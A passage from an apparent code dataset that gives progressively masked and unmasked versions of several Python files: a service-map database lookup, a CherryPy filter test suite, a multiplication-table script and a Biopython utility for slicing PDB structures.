Personality and \"\n \"a HostEnvironment at the same time\")\n\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location,\n personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n # Simplified service map lookup - single service, location-based maps\n # only, no client bindings\n session = object_session(dbservice)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n lazyload('service_instance.service'))\n\n instances = []\n min_seen_priority = (maxsize,)\n\n # We want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n\n session = object_session(dblocation)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n PSLI = PersonalityServiceListItem\n\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))\n\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n\n # Rules for filtering by target object\n q = q.filter(or_(\n and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()),\n ServiceMap.personality == dbstage.personality,\n ServiceMap.host_environment_id == coalesce(\n PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n\n # Rules for filtering by location/scope\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids),\n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n undefer('service_instance._client_count'),\n lazyload('service_instance.service'))\n\n instance_cache = {}\n instance_priority = defaultdict(lambda: (maxsize,))\n\n # For every service, we want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n service = si.service\n\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n\n return instance_cache\n",
"step-ids": [
9,
10,
11,
13,
14
]
}
|
[
9,
10,
11,
13,
14
] |
"""Test the various means of instantiating and invoking filters."""
import types
import test
test.prefer_parent_path()
import cherrypy
from cherrypy import filters
from cherrypy.filters.basefilter import BaseFilter
class AccessFilter(BaseFilter):
def before_request_body(self):
if not cherrypy.config.get("access_filter.on", False):
return
if not getattr(cherrypy.request, "login", None):
raise cherrypy.HTTPError(401)
def setup_server():
class Numerify(BaseFilter):
def on_start_resource(self):
m = cherrypy.config.get("numerify_filter.map", {})
cherrypy.request.numerify_map = m.items()
def before_finalize(self):
if not cherrypy.config.get("numerify_filter.on", False):
return
def number_it(body):
for chunk in body:
for k, v in cherrypy.request.numerify_map:
chunk = chunk.replace(k, v)
yield chunk
cherrypy.response.body = number_it(cherrypy.response.body)
# It's not mandatory to inherit from BaseFilter.
class NadsatFilter:
def __init__(self):
self.counter = 0
self.ended = {}
def before_main(self):
cherrypy.request.counter = self.counter = self.counter + 1
self.ended[cherrypy.request.counter] = False
def before_finalize(self):
def nadsat_it_up(body):
for chunk in body:
chunk = chunk.replace("good", "horrorshow")
chunk = chunk.replace("piece", "lomtick")
yield chunk
cherrypy.response.body = nadsat_it_up(cherrypy.response.body)
def on_end_request(self):
# This runs after the request has been completely written out.
cherrypy.response.body = "razdrez"
self.ended[cherrypy.request.counter] = True
class Root:
def index(self):
return "Howdy earth!"
index.exposed = True
cherrypy.root = Root()
class TestType(type):
"""Metaclass which automatically exposes all functions in each subclass,
and adds an instance of the subclass as an attribute of cherrypy.root.
"""
def __init__(cls, name, bases, dct):
type.__init__(name, bases, dct)
for value in dct.itervalues():
if isinstance(value, types.FunctionType):
value.exposed = True
setattr(cherrypy.root, name.lower(), cls())
class Test(object):
__metaclass__ = TestType
class CPFilterList(Test):
# METHOD ONE:
# Use _cp_filters (old name: _cpFilterList)
_cp_filters = [NadsatFilter()]
def index(self):
return "A good piece of cherry pie"
def ended(self, id):
return repr(self._cp_filters[0].ended[int(id)])
def err(self):
raise ValueError()
def errinstream(self):
raise ValueError()
yield "confidential"
def restricted(self):
return "Welcome!"
def err_in_onstart(self):
return "success!"
cherrypy.config.update({
'global': {
# METHOD TWO:
# Declare a classname in server.input_filters.
'server.input_filters': ["cherrypy.test.test_custom_filters.AccessFilter"],
'server.log_to_screen': False,
'server.environment': 'production',
'server.show_tracebacks': True,
},
'/cpfilterlist': {
'numerify_filter.on': True,
'numerify_filter.map': {"pie": "3.14159"}
},
'/cpfilterlist/restricted': {
'access_filter.on': True,
'server.show_tracebacks': False,
},
'/cpfilterlist/errinstream': {
'stream_response': True,
},
'/cpfilterlist/err_in_onstart': {
# Because this isn't a dict, on_start_resource will error.
'numerify_filter.map': "pie->3.14159"
},
})
# METHOD THREE:
# Insert a class directly into the filters.output_filters chain.
# You can also insert a string, but we're effectively testing
# using-a-string via the config file.
filters.input_filters.insert(0, Numerify)
filters.output_filters.insert(0, Numerify)
# We have to call filters.init() here (if we want methods #2 and #3
# to work), because the test suite may already have run server.start()
# (which is where filters.init() is usually called).
filters.init()
# Client-side code #
import helper
class FilterTests(helper.CPWebCase):
def testCPFilterList(self):
self.getPage("/cpfilterlist/")
# If body is "razdrez", then on_end_request is being called too early.
self.assertBody("A horrorshow lomtick of cherry 3.14159")
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/1")
self.assertBody("True")
valerr = '\n raise ValueError()\nValueError'
self.getPage("/cpfilterlist/err")
# If body is "razdrez", then on_end_request is being called too early.
self.assertErrorPage(500, pattern=valerr)
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/3")
self.assertBody("True")
# If body is "razdrez", then on_end_request is being called too early.
self.getPage("/cpfilterlist/errinstream")
# Because this error is raised after the response body has
# started, the status should not change to an error status.
self.assertStatus("200 OK")
self.assertBody("Unrecoverable error in the server.")
# If this fails, then on_end_request isn't being called at all.
self.getPage("/cpfilterlist/ended/5")
self.assertBody("True")
# Test the config method.
self.getPage("/cpfilterlist/restricted")
self.assertErrorPage(401)
def testGuaranteedFilters(self):
# The on_start_resource and on_end_request filter methods are all
# guaranteed to run, even if there are failures in other on_start
# or on_end methods. This is NOT true of the other filter methods.
# Here, we have set up a failure in NumerifyFilter.on_start_resource,
# but because that failure is logged and passed over, the error
# page we obtain in the user agent should be from before_finalize.
self.getPage("/cpfilterlist/err_in_onstart")
self.assertErrorPage(500)
self.assertInBody("AttributeError: 'Request' object has no "
"attribute 'numerify_map'")
if __name__ == '__main__':
setup_server()
helper.testmain()
|
normal
|
{
"blob_id": "8a412231c13df1b364b6e2a27549730d06048186",
"index": 9978,
"step-1": "<mask token>\n\n\nclass AccessFilter(BaseFilter):\n <mask token>\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\n<mask token>\n",
"step-3": "<mask token>\ntest.prefer_parent_path()\n<mask token>\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n\n class Numerify(BaseFilter):\n\n def on_start_resource(self):\n m = cherrypy.config.get('numerify_filter.map', {})\n cherrypy.request.numerify_map = m.items()\n\n def before_finalize(self):\n if not cherrypy.config.get('numerify_filter.on', False):\n return\n\n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n\n\n class NadsatFilter:\n\n def __init__(self):\n self.counter = 0\n self.ended = {}\n\n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n\n def before_finalize(self):\n\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace('good', 'horrorshow')\n chunk = chunk.replace('piece', 'lomtick')\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n\n def on_end_request(self):\n cherrypy.response.body = 'razdrez'\n self.ended[cherrypy.request.counter] = True\n\n\n class Root:\n\n def index(self):\n return 'Howdy earth!'\n index.exposed = True\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n\n\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n _cp_filters = [NadsatFilter()]\n\n def index(self):\n return 'A good piece of cherry pie'\n\n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n\n def err(self):\n raise ValueError()\n\n def errinstream(self):\n raise ValueError()\n yield 'confidential'\n\n def restricted(self):\n return 'Welcome!'\n\n def err_in_onstart(self):\n return 'success!'\n cherrypy.config.update({'global': {'server.input_filters': [\n 'cherrypy.test.test_custom_filters.AccessFilter'],\n 'server.log_to_screen': False, 'server.environment': 'production',\n 'server.show_tracebacks': True}, '/cpfilterlist': {\n 'numerify_filter.on': True, 'numerify_filter.map': {'pie':\n '3.14159'}}, '/cpfilterlist/restricted': {'access_filter.on': True,\n 'server.show_tracebacks': False}, '/cpfilterlist/errinstream': {\n 'stream_response': True}, '/cpfilterlist/err_in_onstart': {\n 'numerify_filter.map': 'pie->3.14159'}})\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n filters.init()\n\n\n<mask token>\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n",
"step-4": "<mask token>\nimport types\nimport test\ntest.prefer_parent_path()\nimport cherrypy\nfrom cherrypy import filters\nfrom cherrypy.filters.basefilter import BaseFilter\n\n\nclass AccessFilter(BaseFilter):\n\n def before_request_body(self):\n if not cherrypy.config.get('access_filter.on', False):\n return\n if not getattr(cherrypy.request, 'login', None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n\n class Numerify(BaseFilter):\n\n def on_start_resource(self):\n m = cherrypy.config.get('numerify_filter.map', {})\n cherrypy.request.numerify_map = m.items()\n\n def before_finalize(self):\n if not cherrypy.config.get('numerify_filter.on', False):\n return\n\n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n\n\n class NadsatFilter:\n\n def __init__(self):\n self.counter = 0\n self.ended = {}\n\n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n\n def before_finalize(self):\n\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace('good', 'horrorshow')\n chunk = chunk.replace('piece', 'lomtick')\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n\n def on_end_request(self):\n cherrypy.response.body = 'razdrez'\n self.ended[cherrypy.request.counter] = True\n\n\n class Root:\n\n def index(self):\n return 'Howdy earth!'\n index.exposed = True\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n\n\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n _cp_filters = [NadsatFilter()]\n\n def index(self):\n return 'A good piece of cherry pie'\n\n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n\n def err(self):\n raise ValueError()\n\n def errinstream(self):\n raise ValueError()\n yield 'confidential'\n\n def restricted(self):\n return 'Welcome!'\n\n def err_in_onstart(self):\n return 'success!'\n cherrypy.config.update({'global': {'server.input_filters': [\n 'cherrypy.test.test_custom_filters.AccessFilter'],\n 'server.log_to_screen': False, 'server.environment': 'production',\n 'server.show_tracebacks': True}, '/cpfilterlist': {\n 'numerify_filter.on': True, 'numerify_filter.map': {'pie':\n '3.14159'}}, '/cpfilterlist/restricted': {'access_filter.on': True,\n 'server.show_tracebacks': False}, '/cpfilterlist/errinstream': {\n 'stream_response': True}, '/cpfilterlist/err_in_onstart': {\n 'numerify_filter.map': 'pie->3.14159'}})\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n filters.init()\n\n\nimport helper\n\n\nclass FilterTests(helper.CPWebCase):\n\n def testCPFilterList(self):\n self.getPage('/cpfilterlist/')\n self.assertBody('A horrorshow lomtick of cherry 3.14159')\n self.getPage('/cpfilterlist/ended/1')\n self.assertBody('True')\n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage('/cpfilterlist/err')\n self.assertErrorPage(500, pattern=valerr)\n self.getPage('/cpfilterlist/ended/3')\n self.assertBody('True')\n self.getPage('/cpfilterlist/errinstream')\n self.assertStatus('200 OK')\n self.assertBody('Unrecoverable error in the server.')\n self.getPage('/cpfilterlist/ended/5')\n self.assertBody('True')\n self.getPage('/cpfilterlist/restricted')\n self.assertErrorPage(401)\n\n def testGuaranteedFilters(self):\n self.getPage('/cpfilterlist/err_in_onstart')\n self.assertErrorPage(500)\n self.assertInBody(\n \"AttributeError: 'Request' object has no attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n",
"step-5": "\"\"\"Test the various means of instantiating and invoking filters.\"\"\"\n\nimport types\nimport test\ntest.prefer_parent_path()\n\nimport cherrypy\nfrom cherrypy import filters\nfrom cherrypy.filters.basefilter import BaseFilter\n\n\nclass AccessFilter(BaseFilter):\n \n def before_request_body(self):\n if not cherrypy.config.get(\"access_filter.on\", False):\n return\n \n if not getattr(cherrypy.request, \"login\", None):\n raise cherrypy.HTTPError(401)\n\n\ndef setup_server():\n\n class Numerify(BaseFilter):\n \n def on_start_resource(self):\n m = cherrypy.config.get(\"numerify_filter.map\", {})\n cherrypy.request.numerify_map = m.items()\n \n def before_finalize(self):\n if not cherrypy.config.get(\"numerify_filter.on\", False):\n return\n \n def number_it(body):\n for chunk in body:\n for k, v in cherrypy.request.numerify_map:\n chunk = chunk.replace(k, v)\n yield chunk\n cherrypy.response.body = number_it(cherrypy.response.body)\n \n \n # It's not mandatory to inherit from BaseFilter.\n class NadsatFilter:\n \n def __init__(self):\n self.counter = 0\n self.ended = {}\n \n def before_main(self):\n cherrypy.request.counter = self.counter = self.counter + 1\n self.ended[cherrypy.request.counter] = False\n \n def before_finalize(self):\n def nadsat_it_up(body):\n for chunk in body:\n chunk = chunk.replace(\"good\", \"horrorshow\")\n chunk = chunk.replace(\"piece\", \"lomtick\")\n yield chunk\n cherrypy.response.body = nadsat_it_up(cherrypy.response.body)\n \n def on_end_request(self):\n # This runs after the request has been completely written out.\n cherrypy.response.body = \"razdrez\"\n self.ended[cherrypy.request.counter] = True\n\n\n\n class Root:\n def index(self):\n return \"Howdy earth!\"\n index.exposed = True\n\n cherrypy.root = Root()\n\n\n class TestType(type):\n \"\"\"Metaclass which automatically exposes all functions in each subclass,\n and adds an instance of the subclass as an attribute of cherrypy.root.\n \"\"\"\n def __init__(cls, name, bases, dct):\n type.__init__(name, bases, dct)\n for value in dct.itervalues():\n if isinstance(value, types.FunctionType):\n value.exposed = True\n setattr(cherrypy.root, name.lower(), cls())\n class Test(object):\n __metaclass__ = TestType\n\n\n class CPFilterList(Test):\n \n # METHOD ONE:\n # Use _cp_filters (old name: _cpFilterList)\n _cp_filters = [NadsatFilter()]\n \n def index(self):\n return \"A good piece of cherry pie\"\n \n def ended(self, id):\n return repr(self._cp_filters[0].ended[int(id)])\n \n def err(self):\n raise ValueError()\n \n def errinstream(self):\n raise ValueError()\n yield \"confidential\"\n \n def restricted(self):\n return \"Welcome!\"\n \n def err_in_onstart(self):\n return \"success!\"\n\n\n cherrypy.config.update({\n 'global': {\n # METHOD TWO:\n # Declare a classname in server.input_filters.\n 'server.input_filters': [\"cherrypy.test.test_custom_filters.AccessFilter\"],\n 'server.log_to_screen': False,\n 'server.environment': 'production',\n 'server.show_tracebacks': True,\n },\n '/cpfilterlist': {\n 'numerify_filter.on': True,\n 'numerify_filter.map': {\"pie\": \"3.14159\"}\n },\n '/cpfilterlist/restricted': {\n 'access_filter.on': True,\n 'server.show_tracebacks': False,\n },\n '/cpfilterlist/errinstream': {\n 'stream_response': True,\n },\n '/cpfilterlist/err_in_onstart': {\n # Because this isn't a dict, on_start_resource will error.\n 'numerify_filter.map': \"pie->3.14159\"\n },\n })\n\n # METHOD THREE:\n # Insert a class directly into the filters.output_filters chain.\n # You can also insert a string, but we're effectively testing\n # using-a-string via the config file.\n filters.input_filters.insert(0, Numerify)\n filters.output_filters.insert(0, Numerify)\n\n # We have to call filters.init() here (if we want methods #2 and #3\n # to work), because the test suite may already have run server.start()\n # (which is where filters.init() is usually called).\n filters.init()\n\n\n# Client-side code #\n\nimport helper\n\n\nclass FilterTests(helper.CPWebCase):\n \n def testCPFilterList(self):\n self.getPage(\"/cpfilterlist/\")\n # If body is \"razdrez\", then on_end_request is being called too early.\n self.assertBody(\"A horrorshow lomtick of cherry 3.14159\")\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/1\")\n self.assertBody(\"True\")\n \n valerr = '\\n raise ValueError()\\nValueError'\n self.getPage(\"/cpfilterlist/err\")\n # If body is \"razdrez\", then on_end_request is being called too early.\n self.assertErrorPage(500, pattern=valerr)\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/3\")\n self.assertBody(\"True\")\n \n # If body is \"razdrez\", then on_end_request is being called too early.\n self.getPage(\"/cpfilterlist/errinstream\")\n # Because this error is raised after the response body has\n # started, the status should not change to an error status.\n self.assertStatus(\"200 OK\")\n self.assertBody(\"Unrecoverable error in the server.\")\n # If this fails, then on_end_request isn't being called at all.\n self.getPage(\"/cpfilterlist/ended/5\")\n self.assertBody(\"True\")\n \n # Test the config method.\n self.getPage(\"/cpfilterlist/restricted\")\n self.assertErrorPage(401)\n \n def testGuaranteedFilters(self):\n # The on_start_resource and on_end_request filter methods are all\n # guaranteed to run, even if there are failures in other on_start\n # or on_end methods. This is NOT true of the other filter methods.\n # Here, we have set up a failure in NumerifyFilter.on_start_resource,\n # but because that failure is logged and passed over, the error\n # page we obtain in the user agent should be from before_finalize.\n self.getPage(\"/cpfilterlist/err_in_onstart\")\n self.assertErrorPage(500)\n self.assertInBody(\"AttributeError: 'Request' object has no \"\n \"attribute 'numerify_map'\")\n\n\nif __name__ == '__main__':\n setup_server()\n helper.testmain()\n\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while x < 13:
print(n, ' x ', x, ' = ', n * x)
x = x + 1
<|reserved_special_token_1|>
n = int(input('Enter any int number:\n'))
x = 1
while x < 13:
print(n, ' x ', x, ' = ', n * x)
x = x + 1
<|reserved_special_token_1|>
n=int(input("Enter any int number:\n"))
x=1
while(x<13):
print(n ," x ", x ," = ", n*x)
x=x+1
|
flexible
|
{
"blob_id": "a6c07146f1cbc766cd464dab620d1fb075759c12",
"index": 4213,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x < 13:\n print(n, ' x ', x, ' = ', n * x)\n x = x + 1\n",
"step-3": "n = int(input('Enter any int number:\\n'))\nx = 1\nwhile x < 13:\n print(n, ' x ', x, ' = ', n * x)\n x = x + 1\n",
"step-4": "n=int(input(\"Enter any int number:\\n\"))\n\nx=1\nwhile(x<13):\n print(n ,\" x \", x ,\" = \", n*x)\n x=x+1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
<|reserved_special_token_0|>
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.
parse(path_to_fasta, 'fasta')]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
from Bio import BiopythonWarning, SeqIO
from Bio.PDB import MMCIFParser, Dice, PDBParser
from Bio.SeqUtils import seq1
import time
import requests
import re
import warnings
warnings.simplefilter('ignore', BiopythonWarning)
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.
parse(path_to_fasta, 'fasta')]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
from Bio import BiopythonWarning, SeqIO
from Bio.PDB import MMCIFParser, Dice, PDBParser
from Bio.SeqUtils import seq1
import time
import requests
import re
import warnings
warnings.simplefilter('ignore', BiopythonWarning)
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f"Some issues with PDB now. Try again later...\n(URL: {url}")
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id)
